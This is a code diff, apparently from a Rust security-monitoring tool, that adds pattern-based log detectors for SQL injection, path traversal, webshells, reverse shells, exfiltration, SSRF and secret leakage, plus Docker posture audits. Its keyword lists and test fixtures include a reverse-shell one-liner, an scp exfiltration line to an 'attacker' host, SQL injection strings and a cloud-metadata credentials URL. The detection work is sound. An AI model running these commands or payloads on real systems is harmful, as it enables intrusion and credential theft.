std::fmt::Display for DetectorFamily { + fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { + match self { + DetectorFamily::Web => write!(f, "Web"), + DetectorFamily::Exfiltration => write!(f, "Exfiltration"), + DetectorFamily::Execution => write!(f, "Execution"), + DetectorFamily::FileAccess => write!(f, "FileAccess"), + DetectorFamily::Integrity => write!(f, "Integrity"), + DetectorFamily::Configuration => write!(f, "Configuration"), + DetectorFamily::Container => write!(f, "Container"), + DetectorFamily::Vulnerability => write!(f, "Vulnerability"), + DetectorFamily::Cloud => write!(f, "Cloud"), + DetectorFamily::Secrets => write!(f, "Secrets"), + } + } +} + +/// Structured finding emitted by a detector before being converted to a log anomaly. +#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] +pub struct DetectorFinding { + pub detector_id: String, + pub family: DetectorFamily, + pub description: String, + pub severity: AnomalySeverity, + pub confidence: u8, + pub sample_line: String, +} + +impl DetectorFinding { + pub fn to_log_anomaly(&self) -> LogAnomaly { + LogAnomaly { + description: self.description.clone(), + severity: self.severity.clone(), + sample_line: self.sample_line.clone(), + detector_id: Some(self.detector_id.clone()), + detector_family: Some(self.family.to_string()), + confidence: Some(self.confidence), + } + } +} + +/// Detector contract for log-entry based detectors. +pub trait LogDetector: Send + Sync { + fn id(&self) -> &'static str; + fn family(&self) -> DetectorFamily; + fn detect(&self, entries: &[LogEntry]) -> Vec; +} + +/// Registry for built-in and future pluggable detectors. +pub struct DetectorRegistry { + detectors: Vec>, + integrity_monitor: FileIntegrityMonitor, + config_assessment_monitor: ConfigAssessmentMonitor, + package_inventory_monitor: PackageInventoryMonitor, + docker_posture_monitor: DockerPostureMonitor, +} + +impl DetectorRegistry { + pub fn new() -> Self { + Self { + detectors: Vec::new(), + integrity_monitor: FileIntegrityMonitor, + config_assessment_monitor: ConfigAssessmentMonitor, + package_inventory_monitor: PackageInventoryMonitor, + docker_posture_monitor: DockerPostureMonitor, + } + } + + pub fn register(&mut self, detector: D) + where + D: LogDetector + 'static, + { + self.detectors.push(Box::new(detector)); + } + + pub fn register_builtin_log_detectors(&mut self) { + self.register(SqlInjectionProbeDetector); + self.register(PathTraversalDetector); + self.register(LoginBruteForceDetector); + self.register(WebshellProbeDetector); + self.register(ExfiltrationHeuristicDetector); + self.register(ReverseShellDetector); + self.register(SensitiveFileAccessDetector); + self.register(SsrfMetadataDetector); + self.register(ExfiltrationChainDetector); + self.register(SecretLeakageDetector); + } + + pub fn detect_log_anomalies(&self, entries: &[LogEntry]) -> Vec { + let mut anomalies = Vec::new(); + let mut fingerprints = HashSet::new(); + + for detector in &self.detectors { + for finding in detector.detect(entries) { + let fingerprint = format!( + "{}:{}:{}", + finding.detector_id, finding.description, finding.sample_line + ); + if fingerprints.insert(fingerprint) { + anomalies.push(finding.to_log_anomaly()); + } + } + } + + anomalies + } + + pub fn detect_file_integrity_anomalies( + &self, + pool: &DbPool, + paths: &[String], + ) -> Result> { + Ok(self + .integrity_monitor + .detect(pool, paths)? + .into_iter() + .map(|finding| finding.to_log_anomaly()) + .collect()) + } + + pub fn detect_config_assessment_anomalies(&self, paths: &[String]) -> Result> { + Ok(self + .config_assessment_monitor + .detect(paths)? + .into_iter() + .map(|finding| finding.to_log_anomaly()) + .collect()) + } + + pub fn detect_package_inventory_anomalies(&self, paths: &[String]) -> Result> { + Ok(self + .package_inventory_monitor + .detect(paths)? + .into_iter() + .map(|finding| finding.to_log_anomaly()) + .collect()) + } + + pub fn detect_docker_posture_anomalies( + &self, + postures: &[ContainerPosture], + ) -> Vec { + self.docker_posture_monitor + .detect(postures) + .into_iter() + .map(|finding| finding.to_log_anomaly()) + .collect() + } +} + +impl Default for DetectorRegistry { + fn default() -> Self { + let mut registry = Self::new(); + registry.register_builtin_log_detectors(); + registry + } +} + +struct SqlInjectionProbeDetector; +struct PathTraversalDetector; +struct LoginBruteForceDetector; +struct WebshellProbeDetector; +struct ExfiltrationHeuristicDetector; +struct ReverseShellDetector; +struct SensitiveFileAccessDetector; +struct SsrfMetadataDetector; +struct ExfiltrationChainDetector; +struct SecretLeakageDetector; + +impl LogDetector for SqlInjectionProbeDetector { + fn id(&self) -> &'static str { + "web.sqli-probe" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Web + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &[ + "union select", + "or 1=1", + "sleep(", + "benchmark(", + "information_schema", + "sql syntax", + "select%20", + ], + ); + + if matches.len() < 2 { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Potential SQL injection probing detected in {} log entries", + matches.len() + ), + severity: threshold_severity(matches.len(), 2, 5), + confidence: 84, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for PathTraversalDetector { + fn id(&self) -> &'static str { + "web.path-traversal" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Web + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &["../", "..%2f", "%2e%2e%2f", "/etc/passwd", "win.ini"], + ); + + if matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Path traversal probing indicators found in {} log entries", + matches.len() + ), + severity: threshold_severity(matches.len(), 1, 4), + confidence: 82, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for LoginBruteForceDetector { + fn id(&self) -> &'static str { + "web.login-bruteforce" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Web + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &[ + "failed password", + "authentication failure", + "invalid user", + "login failed", + "too many login failures", + "401", + ], + ); + + if matches.len() < 5 { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Repeated authentication failures suggest a brute-force attempt ({} matching entries)", + matches.len() + ), + severity: threshold_severity(matches.len(), 5, 10), + confidence: 78, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for WebshellProbeDetector { + fn id(&self) -> &'static str { + "web.webshell-probe" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Web + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &[ + "cmd=", + "exec=", + "shell=", + "powershell", + "/bin/sh", + "wget http", + "curl http", + "c99", + "r57", + ], + ); + + if matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: "Webshell or remote command execution probing indicators detected" + .to_string(), + severity: AnomalySeverity::High, + confidence: 88, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for ExfiltrationHeuristicDetector { + fn id(&self) -> &'static str { + "exfiltration.egress-heuristic" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Exfiltration + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let command_matches = matching_entries( + entries, + &[ + "sendmail", + "postfix/smtp", + "smtp", + "curl -t", + "scp ", + "rsync ", + "aws s3 cp", + "gpg --encrypt", + "exfil", + "attachment", + "bytes sent", + "uploaded", + ], + ); + let large_transfer_matches: Vec<&LogEntry> = entries + .iter() + .filter(|entry| line_has_large_transfer(&entry.line)) + .collect(); + + let score = command_matches.len() + large_transfer_matches.len(); + if score < 2 { + return Vec::new(); + } + + let sample = command_matches + .first() + .copied() + .or_else(|| large_transfer_matches.first().copied()) + .expect("score >= 2 guarantees at least one match"); + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Possible outbound data exfiltration activity detected ({} suspicious transfer indicators)", + score + ), + severity: threshold_severity(score, 2, 5), + confidence: if !large_transfer_matches.is_empty() { 86 } else { 74 }, + sample_line: sample.line.clone(), + }] + } +} + +impl LogDetector for ReverseShellDetector { + fn id(&self) -> &'static str { + "execution.reverse-shell" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Execution + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let shell_matches = matching_entries( + entries, + &[ + "bash -i", + "/dev/tcp/", + "nc -e", + "ncat -e", + "mkfifo /tmp/", + "python -c", + "import socket", + "pty.spawn", + "socat tcp", + "powershell -nop", + ], + ); + let network_matches = matching_entries( + entries, + &[ + "connect to ", + "dial tcp", + "connection to ", + "remote host", + "reverse shell", + "listening on", + ], + ); + + if shell_matches.is_empty() || network_matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: "Potential reverse shell behavior detected from shell execution plus network activity".to_string(), + severity: AnomalySeverity::Critical, + confidence: 91, + sample_line: shell_matches[0].line.clone(), + }] + } +} + +impl LogDetector for SensitiveFileAccessDetector { + fn id(&self) -> &'static str { + "file.sensitive-access" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::FileAccess + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &[ + "/etc/shadow", + "/root/.ssh/id_rsa", + "/home/", + ".aws/credentials", + ".kube/config", + ".env", + "authorized_keys", + "known_hosts", + "secrets.yaml", + ], + ) + .into_iter() + .filter(|entry| { + contains_any( + &entry.line, + &["open", "read", "cat", "cp ", "access", "download"], + ) + }) + .collect::>(); + + if matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Sensitive file access indicators detected in {} log entries", + matches.len() + ), + severity: threshold_severity(matches.len(), 1, 3), + confidence: 87, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for SsrfMetadataDetector { + fn id(&self) -> &'static str { + "cloud.metadata-ssrf" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Cloud + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches = matching_entries( + entries, + &[ + "169.254.169.254", + "latest/meta-data", + "metadata.google.internal", + "computemetadata/v1", + "/metadata/instance", + "x-aws-ec2-metadata-token", + ], + ); + + if matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: "Possible SSRF or direct cloud metadata access detected".to_string(), + severity: threshold_severity(matches.len(), 1, 3), + confidence: 89, + sample_line: matches[0].line.clone(), + }] + } +} + +impl LogDetector for ExfiltrationChainDetector { + fn id(&self) -> &'static str { + "exfiltration.chain" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Exfiltration + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let archive_matches = matching_entries( + entries, + &[ + "tar cz", + "zip -r", + "gzip ", + "7z a", + "gpg --encrypt", + "openssl enc", + "archive created", + ], + ); + let transfer_matches = matching_entries( + entries, + &[ + "scp ", + "rsync ", + "curl -t", + "aws s3 cp", + "sendmail", + "smtp", + "ftp put", + "upload complete", + ], + ); + + if archive_matches.is_empty() || transfer_matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: "Possible exfiltration chain detected: archive/encrypt followed by outbound transfer".to_string(), + severity: AnomalySeverity::High, + confidence: 90, + sample_line: archive_matches[0].line.clone(), + }] + } +} + +impl LogDetector for SecretLeakageDetector { + fn id(&self) -> &'static str { + "secrets.log-leakage" + } + + fn family(&self) -> DetectorFamily { + DetectorFamily::Secrets + } + + fn detect(&self, entries: &[LogEntry]) -> Vec { + let matches: Vec<&LogEntry> = entries + .iter() + .filter(|entry| line_contains_secret(&entry.line)) + .collect(); + + if matches.is_empty() { + return Vec::new(); + } + + vec![DetectorFinding { + detector_id: self.id().to_string(), + family: self.family(), + description: format!( + "Potential secret leakage detected in {} log entries", + matches.len() + ), + severity: threshold_severity(matches.len(), 1, 2), + confidence: 92, + sample_line: matches[0].line.clone(), + }] + } +} + +fn matching_entries<'a>(entries: &'a [LogEntry], patterns: &[&str]) -> Vec<&'a LogEntry> { + entries + .iter() + .filter(|entry| contains_any(&entry.line, patterns)) + .collect() +} + +fn contains_any(line: &str, patterns: &[&str]) -> bool { + let lower = line.to_ascii_lowercase(); + patterns.iter().any(|pattern| lower.contains(pattern)) +} + +fn threshold_severity( + count: usize, + medium_threshold: usize, + high_threshold: usize, +) -> AnomalySeverity { + if count >= high_threshold { + AnomalySeverity::High + } else if count >= medium_threshold { + AnomalySeverity::Medium + } else { + AnomalySeverity::Low + } +} + +fn line_has_large_transfer(line: &str) -> bool { + extract_named_number(line, "bytes=") + .or_else(|| extract_named_number(line, "size=")) + .is_some_and(|value| value >= 1_000_000) +} + +fn extract_named_number(line: &str, needle: &str) -> Option { + let lower = line.to_ascii_lowercase(); + let start = lower.find(needle)? + needle.len(); + let digits: String = lower[start..] + .chars() + .take_while(|ch| ch.is_ascii_digit()) + .collect(); + (!digits.is_empty()) + .then(|| digits.parse::().ok()) + .flatten() +} + +fn line_contains_secret(line: &str) -> bool { + let lower = line.to_ascii_lowercase(); + lower.contains("authorization: bearer ") + || lower.contains("x-api-key") + || lower.contains("database_url=") + || lower.contains("postgres://") + || lower.contains("mysql://") + || lower.contains("-----begin private key-----") + || lower.contains("aws_secret_access_key") + || lower.contains("slack_webhook") + || lower.contains("token=") + || contains_aws_access_key(line) + || contains_github_token(line) +} + +fn contains_aws_access_key(line: &str) -> bool { + line.as_bytes().windows(20).any(|window| { + window.starts_with(b"AKIA") + && window[4..] + .iter() + .all(|byte| byte.is_ascii_uppercase() || byte.is_ascii_digit()) + }) +} + +fn contains_github_token(line: &str) -> bool { + let lower = line.to_ascii_lowercase(); + ["ghp_", "github_pat_", "gho_", "ghu_", "ghs_"] + .iter() + .any(|prefix| lower.contains(prefix)) +} + +#[cfg(test)] +mod tests { + use super::*; + use chrono::Utc; + use std::collections::HashMap; + + fn make_entries(lines: &[&str]) -> Vec { + lines + .iter() + .map(|line| LogEntry { + source_id: "test-source".into(), + timestamp: Utc::now(), + line: (*line).into(), + metadata: HashMap::new(), + }) + .collect() + } + + #[test] + fn test_registry_detects_web_probe_and_exfiltration_families() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + r#"GET /search?q=' OR 1=1 -- HTTP/1.1"#, + r#"GET /search?q=UNION SELECT password FROM users HTTP/1.1"#, + r#"sendmail invoked for attachment upload bytes=2500000"#, + r#"smtp delivery queued bytes=3500000"#, + ])); + + assert!(anomalies + .iter() + .any(|item| item.detector_family.as_deref() == Some("Web"))); + assert!(anomalies + .iter() + .any(|item| item.detector_family.as_deref() == Some("Exfiltration"))); + } + + #[test] + fn test_registry_detects_bruteforce() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + "Failed password for root from 192.0.2.10 port 22 ssh2", + "Failed password for root from 192.0.2.10 port 22 ssh2", + "Failed password for root from 192.0.2.10 port 22 ssh2", + "Failed password for root from 192.0.2.10 port 22 ssh2", + "Failed password for root from 192.0.2.10 port 22 ssh2", + ])); + + assert_eq!(anomalies.len(), 1); + assert_eq!( + anomalies[0].detector_id.as_deref(), + Some("web.login-bruteforce") + ); + } + + #[test] + fn test_large_transfer_parser() { + assert!(line_has_large_transfer("uploaded archive bytes=1200000")); + assert!(line_has_large_transfer("transfer complete size=2500000")); + assert!(!line_has_large_transfer("uploaded bytes=1024")); + } + + #[test] + fn test_registry_detects_reverse_shell() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1", + "connection to remote host 203.0.113.10 established", + ])); + + assert!(anomalies + .iter() + .any(|item| item.detector_id.as_deref() == Some("execution.reverse-shell"))); + } + + #[test] + fn test_registry_detects_sensitive_file_access() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + "openat path=/etc/shadow pid=1234", + "read /etc/shadow by suspicious process", + ])); + + assert!(anomalies + .iter() + .any(|item| item.detector_id.as_deref() == Some("file.sensitive-access"))); + } + + #[test] + fn test_registry_detects_metadata_ssrf() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + "GET http://169.254.169.254/latest/meta-data/iam/security-credentials/", + ])); + + assert!(anomalies + .iter() + .any(|item| item.detector_id.as_deref() == Some("cloud.metadata-ssrf"))); + } + + #[test] + fn test_registry_detects_exfiltration_chain() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + "tar czf /tmp/archive.tgz /srv/data", + "scp /tmp/archive.tgz attacker@203.0.113.5:/tmp/", + ])); + + assert!(anomalies + .iter() + .any(|item| item.detector_id.as_deref() == Some("exfiltration.chain"))); + } + + #[test] + fn test_registry_detects_secret_leakage() { + let registry = DetectorRegistry::default(); + let anomalies = registry.detect_log_anomalies(&make_entries(&[ + "Authorization: Bearer super-secret-token", + "AWS_SECRET_ACCESS_KEY=abc123", + ])); + + assert!(anomalies + .iter() + .any(|item| item.detector_id.as_deref() == Some("secrets.log-leakage"))); + } + + #[test] + fn test_secret_detectors_identify_provider_specific_tokens() { + assert!(contains_github_token("github_pat_1234567890")); + assert!(contains_aws_access_key("AKIAABCDEFGHIJKLMNOP")); + assert!(!contains_aws_access_key("AKIAshort")); + } +} diff --git a/src/docker/client.rs b/src/docker/client.rs index 44211d8..9efbaba 100644 --- a/src/docker/client.rs +++ b/src/docker/client.rs @@ -93,6 +93,63 @@ impl DockerClient { }) } + /// Get posture information by ID for detector-backed audits + pub async fn get_container_posture( + &self, + container_id: &str, + ) -> Result { + let inspect = self + .client + .inspect_container(container_id, None::) + .await + .context("Failed to inspect container")?; + + let config = inspect.config.unwrap_or_default(); + let host_config = inspect.host_config.unwrap_or_default(); + + Ok(crate::detectors::ContainerPosture { + container_id: container_id.to_string(), + name: inspect + .name + .unwrap_or_else(|| container_id[..12].to_string()) + .trim_start_matches('/') + .to_string(), + image: config.image.unwrap_or_else(|| "unknown".to_string()), + privileged: host_config.privileged.unwrap_or(false), + network_mode: host_config.network_mode.filter(|value| !value.is_empty()), + pid_mode: host_config.pid_mode.filter(|value| !value.is_empty()), + cap_add: host_config.cap_add.unwrap_or_default(), + mounts: host_config.binds.unwrap_or_default(), + }) + } + + /// List container posture information for detector-backed audits + pub async fn list_container_postures( + &self, + all: bool, + ) -> Result> { + let options: Option> = Some(ListContainersOptions { + all, + size: false, + ..Default::default() + }); + + let containers = self + .client + .list_containers(options) + .await + .context("Failed to list containers for posture audit")?; + + let mut result = Vec::new(); + for container in containers { + if let Some(id) = container.id { + result.push(self.get_container_posture(&id).await?); + } + } + + Ok(result) + } + /// Quarantine a container (disconnect from all networks) pub async fn quarantine_container(&self, container_id: &str) -> Result<()> { // List all networks diff --git a/src/lib.rs b/src/lib.rs index 1f663f0..0888f58 100644 --- a/src/lib.rs +++ b/src/lib.rs @@ -50,6 +50,7 @@ pub mod collectors; pub mod baselines; pub mod correlator; pub mod database; +pub mod detectors; pub mod docker; pub mod ip_ban; pub mod ml; diff --git a/src/main.rs b/src/main.rs index 041c13d..2f17e37 100644 --- a/src/main.rs +++ b/src/main.rs @@ -203,6 +203,18 @@ async fn run_sniff(config: sniff::config::SniffConfig) -> io::Result<()> { info!("Consume: {}", config.consume); info!("Output: {}", config.output_dir.display()); info!("Interval: {}s", config.interval_secs); + if !config.integrity_paths.is_empty() { + info!("FIM Paths: {}", config.integrity_paths.len()); + } + if !config.config_assessment_paths.is_empty() { + info!("SCA Paths: {}", config.config_assessment_paths.len()); + } + if !config.package_inventory_paths.is_empty() { + info!( + "Package Inventories: {}", + config.package_inventory_paths.len() + ); + } info!("AI Provider: {:?}", config.ai_provider); info!("AI Model: {}", config.ai_model); info!("AI API URL: {}", config.ai_api_url); diff --git a/src/sniff/analyzer.rs b/src/sniff/analyzer.rs index 26a720f..05a7d45 100644 --- a/src/sniff/analyzer.rs +++ b/src/sniff/analyzer.rs @@ -36,10 +36,16 @@ pub struct LogAnomaly { pub description: String, pub severity: AnomalySeverity, pub sample_line: String, + #[serde(skip_serializing_if = "Option::is_none")] + pub detector_id: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub detector_family: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub confidence: Option, } /// Severity of a detected anomaly -#[derive(Debug, Clone, PartialEq, Serialize, Deserialize)] +#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] pub enum AnomalySeverity { Low, Medium, @@ -328,6 +334,9 @@ fn parse_llm_response(source_id: &str, entries: &[LogEntry], raw_json: &str) -> description: a.description.unwrap_or_default(), severity: parse_severity(&a.severity.unwrap_or_default()), sample_line: a.sample_line.unwrap_or_default(), + detector_id: None, + detector_family: None, + confidence: None, }) .collect(); @@ -554,6 +563,9 @@ impl LogAnalyzer for PatternAnalyzer { ), severity: AnomalySeverity::High, sample_line: sample.line.clone(), + detector_id: None, + detector_family: None, + confidence: None, }); } } @@ -862,6 +874,9 @@ mod tests { description: "Test anomaly".into(), severity: AnomalySeverity::Medium, sample_line: "WARN: something".into(), + detector_id: None, + detector_family: None, + confidence: None, }], }; let json = serde_json::to_string(&summary).unwrap(); diff --git a/src/sniff/config.rs b/src/sniff/config.rs index cee76bf..c147a69 100644 --- a/src/sniff/config.rs +++ b/src/sniff/config.rs @@ -36,6 +36,12 @@ pub struct SniffConfig { pub output_dir: PathBuf, /// Additional log source paths (user-configured) pub extra_sources: Vec, + /// Explicit file or directory paths to monitor for integrity drift + pub integrity_paths: Vec, + /// Explicit config files to audit for insecure settings + pub config_assessment_paths: Vec, + /// Explicit package inventory files to audit for legacy versions + pub package_inventory_paths: Vec, /// Poll interval in seconds pub interval_secs: u64, /// AI provider to use for summarization @@ -102,6 +108,25 @@ impl SniffConfig { } } + let integrity_paths = env::var("STACKDOG_FIM_PATHS") + .unwrap_or_default() + .split(',') + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) + .collect(); + let config_assessment_paths = env::var("STACKDOG_SCA_PATHS") + .unwrap_or_default() + .split(',') + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) + .collect(); + let package_inventory_paths = env::var("STACKDOG_PACKAGE_INVENTORY_PATHS") + .unwrap_or_default() + .split(',') + .map(|s| s.trim().to_string()) + .filter(|s| !s.is_empty()) + .collect(); + let ai_provider_str = args.ai_provider.map(|s| s.to_string()).unwrap_or_else(|| { env::var("STACKDOG_AI_PROVIDER").unwrap_or_else(|_| "openai".into()) }); @@ -128,6 +153,9 @@ impl SniffConfig { consume: args.consume, output_dir, extra_sources, + integrity_paths, + config_assessment_paths, + package_inventory_paths, interval_secs, ai_provider: ai_provider_str.parse().unwrap(), ai_api_url: args @@ -193,6 +221,9 @@ mod tests { fn clear_sniff_env() { env::remove_var("STACKDOG_LOG_SOURCES"); + env::remove_var("STACKDOG_FIM_PATHS"); + env::remove_var("STACKDOG_SCA_PATHS"); + env::remove_var("STACKDOG_PACKAGE_INVENTORY_PATHS"); env::remove_var("STACKDOG_AI_PROVIDER"); env::remove_var("STACKDOG_AI_API_URL"); env::remove_var("STACKDOG_AI_API_KEY"); @@ -243,6 +274,9 @@ mod tests { assert!(!config.consume); assert_eq!(config.output_dir, PathBuf::from("./stackdog-logs/")); assert!(config.extra_sources.is_empty()); + assert!(config.integrity_paths.is_empty()); + assert!(config.config_assessment_paths.is_empty()); + assert!(config.package_inventory_paths.is_empty()); assert_eq!(config.interval_secs, 30); assert_eq!(config.ai_provider, AiProvider::OpenAi); assert_eq!(config.ai_api_url, "http://localhost:11434/v1"); @@ -319,6 +353,84 @@ mod tests { clear_sniff_env(); } + #[test] + fn test_sniff_config_fim_paths_from_env() { + let _lock = ENV_MUTEX.lock().unwrap(); + clear_sniff_env(); + env::set_var("STACKDOG_FIM_PATHS", "/etc/ssh/sshd_config, /app/.env"); + + let config = SniffConfig::from_env_and_args(SniffArgs { + once: false, + consume: false, + output: "./stackdog-logs/", + sources: None, + interval: 30, + ai_provider: None, + ai_model: None, + ai_api_url: None, + slack_webhook: None, + webhook_url: None, + smtp_host: None, + smtp_port: None, + smtp_user: None, + smtp_password: None, + email_recipients: None, + }); + + assert_eq!( + config.integrity_paths, + vec!["/etc/ssh/sshd_config".to_string(), "/app/.env".to_string()] + ); + + clear_sniff_env(); + } + + #[test] + fn test_sniff_config_audit_paths_from_env() { + let _lock = ENV_MUTEX.lock().unwrap(); + clear_sniff_env(); + env::set_var("STACKDOG_SCA_PATHS", "/etc/ssh/sshd_config,/etc/sudoers"); + env::set_var( + "STACKDOG_PACKAGE_INVENTORY_PATHS", + "/var/lib/dpkg/status,/lib/apk/db/installed", + ); + + let config = SniffConfig::from_env_and_args(SniffArgs { + once: false, + consume: false, + output: "./stackdog-logs/", + sources: None, + interval: 30, + ai_provider: None, + ai_model: None, + ai_api_url: None, + slack_webhook: None, + webhook_url: None, + smtp_host: None, + smtp_port: None, + smtp_user: None, + smtp_password: None, + email_recipients: None, + }); + + assert_eq!( + config.config_assessment_paths, + vec![ + "/etc/ssh/sshd_config".to_string(), + "/etc/sudoers".to_string() + ] + ); + assert_eq!( + config.package_inventory_paths, + vec![ + "/var/lib/dpkg/status".to_string(), + "/lib/apk/db/installed".to_string() + ] + ); + + clear_sniff_env(); + } + #[test] fn test_sniff_config_env_overrides_defaults() { let _lock = ENV_MUTEX.lock().unwrap(); diff --git a/src/sniff/mod.rs b/src/sniff/mod.rs index 8a3d07d..f009cc6 100644 --- a/src/sniff/mod.rs +++ b/src/sniff/mod.rs @@ -13,6 +13,8 @@ pub mod reporter; use crate::alerting::notifications::NotificationConfig; use crate::database::connection::{create_pool, init_database, DbPool}; use crate::database::repositories::log_sources as log_sources_repo; +use crate::detectors::DetectorRegistry; +use crate::docker::DockerClient; use crate::ip_ban::{IpBanConfig, IpBanEngine, OffenseInput}; use crate::sniff::analyzer::{LogAnalyzer, PatternAnalyzer}; use crate::sniff::config::SniffConfig; @@ -21,11 +23,13 @@ use crate::sniff::discovery::LogSourceType; use crate::sniff::reader::{DockerLogReader, FileLogReader, LogReader}; use crate::sniff::reporter::Reporter; use anyhow::Result; +use chrono::Utc; /// Main orchestrator for the sniff command pub struct SniffOrchestrator { config: SniffConfig, pool: DbPool, + detectors: DetectorRegistry, reporter: Reporter, ip_ban: Option, } @@ -67,6 +71,7 @@ impl SniffOrchestrator { Ok(Self { config, pool, + detectors: DetectorRegistry::default(), reporter, ip_ban, }) @@ -123,6 +128,49 @@ impl SniffOrchestrator { pub async fn run_once(&self) -> Result { let mut result = SniffPassResult::default(); + self.report_detector_batch( + &mut result, + "file-integrity", + self.config.integrity_paths.len(), + "File integrity monitoring", + self.detectors + .detect_file_integrity_anomalies(&self.pool, &self.config.integrity_paths)?, + ) + .await?; + self.report_detector_batch( + &mut result, + "config-assessment", + self.config.config_assessment_paths.len(), + "Configuration assessment", + self.detectors + .detect_config_assessment_anomalies(&self.config.config_assessment_paths)?, + ) + .await?; + self.report_detector_batch( + &mut result, + "package-audit", + self.config.package_inventory_paths.len(), + "Package inventory audit", + self.detectors + .detect_package_inventory_anomalies(&self.config.package_inventory_paths)?, + ) + .await?; + + match DockerClient::new().await { + Ok(docker) => { + let postures = docker.list_container_postures(true).await?; + self.report_detector_batch( + &mut result, + "docker-posture", + postures.len(), + "Docker posture audit", + self.detectors.detect_docker_posture_anomalies(&postures), + ) + .await?; + } + Err(err) => log::debug!("Skipping Docker posture audit: {}", err), + } + // 1. Discover sources log::debug!("Step 1: discovering log sources..."); let sources = discovery::discover_all(&self.config.extra_sources).await?; @@ -168,7 +216,17 @@ impl SniffOrchestrator { // 4. Analyze log::debug!("Step 4: analyzing {} entries...", entries.len()); - let summary = analyzer.summarize(&entries).await?; + let mut summary = analyzer.summarize(&entries).await?; + let detector_anomalies = self.detectors.detect_log_anomalies(&entries); + if !detector_anomalies.is_empty() { + summary.key_events.extend( + detector_anomalies + .iter() + .take(5) + .map(|anomaly| anomaly.description.clone()), + ); + summary.anomalies.extend(detector_anomalies); + } log::debug!( " Analysis complete: {} errors, {} warnings, {} anomalies", summary.error_count, @@ -250,6 +308,38 @@ impl SniffOrchestrator { Ok(()) } + async fn report_detector_batch( + &self, + result: &mut SniffPassResult, + source_id: &str, + total_entries: usize, + label: &str, + anomalies: Vec, + ) -> Result<()> { + if anomalies.is_empty() { + return Ok(()); + } + + let summary = analyzer::LogSummary { + source_id: source_id.into(), + period_start: Utc::now(), + period_end: Utc::now(), + total_entries, + summary_text: format!("{} detected {} anomaly entries", label, anomalies.len()), + error_count: 0, + warning_count: 0, + key_events: anomalies + .iter() + .take(5) + .map(|anomaly| anomaly.description.clone()) + .collect(), + anomalies, + }; + let report = self.reporter.report(&summary, Some(&self.pool)).await?; + result.anomalies_found += report.anomalies_reported; + Ok(()) + } + /// Run the sniff loop (continuous or one-shot) pub async fn run(&self) -> Result<()> { log::info!("🔍 Sniff orchestrator started"); @@ -350,6 +440,9 @@ mod tests { description: "Repeated failed ssh login".into(), severity, sample_line: sample_line.into(), + detector_id: None, + detector_family: None, + confidence: None, }], } } @@ -426,6 +519,133 @@ mod tests { assert!(result.total_entries >= 3); } + #[tokio::test] + async fn test_orchestrator_applies_builtin_detectors_to_log_entries() { + use std::io::Write; + let dir = tempfile::tempdir().unwrap(); + let log_path = dir.path().join("attacks.log"); + { + let mut f = std::fs::File::create(&log_path).unwrap(); + writeln!(f, r#"GET /search?q=' OR 1=1 -- HTTP/1.1"#).unwrap(); + writeln!( + f, + r#"GET /search?q=UNION SELECT password FROM users HTTP/1.1"# + ) + .unwrap(); + writeln!(f, "sendmail invoked for attachment bytes=2000000").unwrap(); + writeln!(f, "smtp delivery queued bytes=3000000").unwrap(); + } + + let mut config = SniffConfig::from_env_and_args(config::SniffArgs { + once: true, + consume: false, + output: 